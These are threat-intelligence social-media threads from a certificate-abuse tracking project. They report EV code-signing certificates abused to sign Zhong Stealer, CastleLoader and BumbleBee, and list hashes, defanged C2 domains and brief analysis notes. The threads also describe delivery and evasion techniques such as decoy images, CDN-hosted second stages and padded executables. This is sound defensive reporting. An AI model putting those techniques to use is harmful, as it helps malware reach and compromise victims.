Use CertGraveyard.org to get a list of hashes for the 69 ZhongStealer hashes.
When we come to understand how they are obtaining the certificates, we'll share here.
Until then, we'll continue working with the CA to mitigate the harm.
7/7
If you want a more in-depth analysis and indicators, Claude and I have been cooking:
First stage analysis: github.com/Squiblydo...
Second stage: github.com/Squiblydo...
We have a directory of other Zhong Stealer analysis, tools, WIP bot emulator: github.com/Squiblydo...
6/7
One recent first stage was signed "Xiamen Xianghe Information Technology Co., Ltd."
The second stage consists of the following:
NvBackend.exe used the leaked 2018 Nvidia cert.
detoured.dll was the Lenovo signed binary.
NvBackend.log is a shellcode loader
5/7
The name Zhong Stealer seems to be a misnomer. Based on my analysis, it seems to be a RAT.
They send a fake image/screenshot in a phishing email.
When ran by a user, it displays a JPEG of an error, and pulls down the second stage from a CDN like AWS.
4/7
These certificates are unlike the other 2,100 we've tracked.
They are new certificates issued to existing customers and only used to sign malware. To be clear, they aren't supply chain poisoning.
We've seen 12 issued like this, 69 for this same malware: Zhong Stealer
3/7
First things:
Each of these were mitigated.
The issuing Cert Authorities were quick to act when notified.
No, I don't understand how these are getting issued and abused. GoldenEyeDog seems to have unrestrained ability to create them.
There may be unknown ones.
2/7
What do Lenovo, Kingston, Shuttle Inc, and Palit Microsystems have in common?
EV Certificates from these companies were issued and used by a Chinese crime group, #GoldenEyeDog (#APT-Q-27)!
Thanks @malwrhunterteam and @g0njxa for your contributions
1/7
VirusTotal's maximum size is 650MB; potential victims can't upload it there.
The certificate has been reported and revoked.
A subcomponent of the file was uploaded to VirusTotal: b531ee0e453c6a514daa09a4e7d6e8fae8f433269afba59035d84e68a5ff42a2.
MB: bazaar.abuse.ch/samp...
2/2
AnchorWallet[.]org is fake. The real place to download the wallet is Greymass[.]com.
If you download the Windows app from the fake, you get a 680MB remote access tool signed by PIXEL PLAY PRIVATE LIMITED. Not an app signed by Greymass.
h/t @malwrhunterteam
1/2
There is garbage text and then some Python.
Highlight the base64. Right-click -> Transform. Cyberchef like interface; base64 decode, change text encoding.
"Open in New file" lets us open it in a separate analysis. Theres our C2: fillenmore[.]com
bazaar.abuse.ch/samp...
3/3
Opening it up in malcat, we can see it identified the compressed Nullsoft Installer bits (Image 1).
Double clicking unpacks it. We then have new files to look at. A few are .txt files, we can doubleclick to open them. This first one actually happens to be what we want.
2/3
FUD CastleLoader signed "INFOTECK SOLUTIONS PRIVATE LIMITED"
The 40MB exe makes it hard for detection engines to see the 1 important line of python it will execute. Short #malcat investigation though.
62a6e64a7233f4a756d01c54840ff703a620a416929d57eebc0bdac3b9ed2019
1/3
When I clicked on the "Bluesky Issues" trending link earlier today, every account in the first few scrolldowns was reposting the exact same text blaming the problem on AI. Each account was clearly inauthentic and was advertising video game material in its profile.
The full report can be found here and is well worth the read. research.cert.orange...
2/2
Orange Cyberdefence recently published their research on SmokedHam. We're glad to see Cert Graveyard and the code-signing certs mentioned.
While CertGraveyard tracks the campaigns, we can't investigate them to their full depth (due to capacity), so this is great to see.
1/2
I don't know how to feel about this domain: maybedontbanplease[.]com
What to do? Chat, can you help me out?
(CastleLoader
4ba0d3ae41a0ae3143e8c2c3307c24b0d548593f97c79a30c0387b3d62504c31 signed "SERPENTINE SOLAR LIMITED"
NSIS -> Python execution -> loads remote resource)
These are just a small subset of what we track. Over time, we've tracked 91 certificates we associate with Golden eye dog; signing both Zhong Stealer and ValleyRAT.
You can get the whole list of certs from CertGraveyard's lookup page.
4/4
These are the signer's we've reported in April:
Xiamen Liuyong Information Technology Co., Ltd.
Xiamen Dahonghuo Technology Co., Ltd.
Beijing 263 Enterprise Correspondence Co., Ltd.
MobSoft Co., Ltd
深圳市优品投资顾问有限公司
Brunner Informatik AG
3/4
The main malware we're seeing via CertGraveyard is tracked as Zhong Stealer.
They host the 2nd stage on legitimate CDN, one of the files they host is a picture of a 505 error this is used as a decoy.
2/4
Golden Eye Dog (APT-Q-27) seems to have come back from break.
We've seen 6 unique EV code-signing certs for campaigns in April already.
All of these get reported and all get revoked.
More about them in the thread.
h/t @g0njxa, @malwrhunterteam
1/4
Special thanks @abuse_ch for making MalwareBazaar available, so that we can easily find signed malware.
Thank you official partners for your support and tools:
@unpacme
Malcat dev
@magicswordio
3/3
This post gives a broad overview of the CertGraveyard's mission and the tools the tools we use, how you can get involved, and how you can leverage our data for your own cyber defense:
squiblydoo.blog/2026...
2/3
The CertGraveyard was created in 2025, but never received a proper introduction.
We track abused code-signing certificates.
When I created the site, we had 600 entries and now we have 2,250.
See the blogpost below for a full overview.
1/3
The history of BumbleBee's relationship with certificates can be viewed a few ways with CertGraveyard. You can review via a table, a graph, or download the whole database to transform the data yourself.
4/4
This was a great example of why CertGraveyard exists: we were able to document and observe the pattern, allowing us to report the certificate, causing Windows to not trust it as soon as the campaign started.
We're always looking for more people to get involved. Interested?
3/4
If you missed it, NovaViewer was previously signed by "Xiamen Xisu Technology Co., Ltd.". The cert was then used to sign BumbleBee, disguised as "Azure-CLI.msi".
The latest BumbleBee was disguised as an NX Witness installer:
6d6a861c133ff3e1aa09c8744de52413
2/4
We saw NovaViewer being signed with a new EV certificate "Xiamen Duohanbeiwei Network Co., Ltd". This certificate was reported and revoked before the certificate was used in a BumbleBee campaign.
6d6a861c133ff3e1aa09c8744de52413
Special thanks to @luke92881 and @g0njxa
1/4
NEW: Yes, ICE can lie to you and to other law enforcement—and they've been doing it for decades. @telliotter.bsky.social reports: www.wired.com/story/why-ic...
Our database is one of the blocklists used by MagicSword.
Files with certificates issued to cybercriminals are actually stopped from impacting systems: whether the cert provider revokes the certificate or not.
6/6
